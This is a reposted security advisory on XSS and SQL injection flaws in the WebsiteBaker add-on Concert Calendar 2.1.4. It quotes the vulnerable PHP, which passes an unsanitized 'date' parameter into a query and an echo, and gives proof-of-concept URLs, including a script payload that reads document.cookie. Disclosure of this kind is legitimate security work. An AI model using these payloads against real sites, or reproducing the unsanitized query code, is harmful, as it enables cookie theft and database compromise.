扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 |
Advisory: Websitebaker Add-on 'Concert Calendar 2.1.4' XSS & SQLi vulnerability Advisory ID: SSCHADV2013-001 Author: Stefan Schurtz Affected Software: Successfully tested on Concert Calendar 2.1.4 Vendor URL: http://addons.websitebaker2.org/pages/en/browse-add-ons.php?id=0E8BC37 Vendor Status: informed ========================== Vulnerability Description ========================== Websitebaker Add-on 'Concert Calendar 2.1.4' is prone to a XSS and SQLi vulnerability ========================== Vuln code ========================== // view.php if (isset($_GET['date'])) { $date = $_GET['date']; } . . . // SQLi $query_dates = mysql_query("SELECT * FROM ".TABLE_PREFIX."mod_concert_dates WHERE section_id = '$section_id' && concert_date = '$date'"); // Zeile 184 // XSS echo " ".switch_date($date, $dateview)." "; // Zeile 176 ========================== PoC-Exploit ========================== // SQLi (magic_quotes = off) http://[target]/wb/pages/addon.php?date=[SQLi] // XSS http://[target]/wb/pages/addon.php?date='"><script>alert(document.cookie)</script> ========================== Solution ========================== - ========================== Disclosure Timeline ========================== 01-Jan-2013 - developer informed ========================== Credits ========================== Vulnerabilities found and advisory written by Stefan Schurtz. ========================== References ========================== http://addons.websitebaker2.org/pages/en/browse-add-ons.php?id=0E8BC37 http://www.darksecurity.de/advisories/2012/SSCHADV2012-022.txt |
体验盒子
